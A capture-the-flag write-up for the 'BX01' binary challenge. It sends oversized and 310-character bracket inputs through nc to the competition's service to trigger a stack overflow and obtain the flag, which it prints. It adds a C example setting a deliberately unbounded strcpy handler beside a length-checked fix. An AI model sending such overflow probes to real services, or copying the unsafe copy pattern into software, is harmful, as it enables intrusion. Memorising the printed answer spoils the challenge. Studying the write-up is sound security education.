# BX01 - 1000pts

## Briefing

> Access the network service at url: `cfta-bx01.allyourbases.co` and port: `8012` and find a way to get the flag by formatting a valid request.

## Solution

1. I completely overthought this problem: I was trying advanced buffer overflow techniques (trying to get past a canary, etc.) when the valid request is actually pretty simple.
2. I start by testing if the service is vulnerable to a buffer overflow: `python -c "print('a'*700)" | nc cfta-bx01.allyourbases.co 8012`

   ```
    Processing request...
    Exception: angle brackets not terminated.
    *** stack smashing detected ***
   ```

   Looks like it is vulnerable.
3. I wrote a simple [pwntools Python script](https://github.com/HHousen/NCS-Competition/tree/e3a1ab990b675bd865fdddd9e5fa5cd7895b3b02/Binary/BX01/script.py) to try some possible offsets and found the overflow to happen at `311`, so the offset is `310`.
4. `python -c "print('a'*310)" | nc cfta-bx01.allyourbases.co 8012` simply outputs:

   ```
    Processing request...
    Exception: angle brackets not terminated.
   ```
5. We can send 310 `>`s instead of `a`s to terminate the angle brackets and get the flag: `python -c "print('>'*310)" | nc cfta-bx01.allyourbases.co 8012`:

   ```
    Processing request...
    Exception: angle brackets not terminated.
    Request successful.

    Flag: AlOnGSeaRcHFoROverWriTe
   ```
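The service's source is not on the page. As an added example (not part of the original writeup or the challenge), this constructed C handler shows the class of bug the `stack smashing detected` message points to, next to a length-checked version. The 310-byte buffer size, the function names and the bracket rule are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define REQ_MAX 310 /* assumed buffer size, borrowed from the offset in step 3 */

enum req_status { REQ_OK, REQ_TOO_LONG, REQ_BAD_BRACKETS };

/* Vulnerable pattern (constructed): strcpy has no bound, so input longer than
 * the buffer overwrites adjacent stack data. For comparison only; never called. */
enum req_status handle_unsafe(const char *input) {
    char buf[REQ_MAX];
    strcpy(buf, input);
    return strchr(buf, '>') ? REQ_OK : REQ_BAD_BRACKETS;
}

/* Hardened form: the length is checked before any byte is copied, and the
 * bracket check walks only the bytes that were received. */
enum req_status handle_safe(const char *input, size_t len) {
    char buf[REQ_MAX];
    int depth = 0, pairs = 0;
    if (len > sizeof buf)
        return REQ_TOO_LONG;
    memcpy(buf, input, len);
    for (size_t i = 0; i < len; i++) {
        if (buf[i] == '<') {
            depth++;
        } else if (buf[i] == '>') {
            if (depth == 0)
                return REQ_BAD_BRACKETS; /* '>' with no opening '<' */
            depth--;
            pairs++;
        }
    }
    return (depth == 0 && pairs > 0) ? REQ_OK : REQ_BAD_BRACKETS;
}

int main(void) {
    char big[700], edge[REQ_MAX];
    memset(big, 'a', sizeof big);   /* constructed: the 700-byte probe */
    memset(edge, '>', sizeof edge); /* constructed: 310 '>' characters */
    printf("700 x 'a': %d\n", handle_safe(big, sizeof big));
    printf("310 x '>': %d\n", handle_safe(edge, sizeof edge));
    printf("<status>:  %d\n", handle_safe("<status>", 8));
    return 0;
}
```

With the length check in front of the copy, oversized input is rejected as `REQ_TOO_LONG` instead of reaching the stack, and the bracket result no longer depends on what sits next to the buffer.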

### Flag

`AlOnGSeaRcHFoROverWriTe`
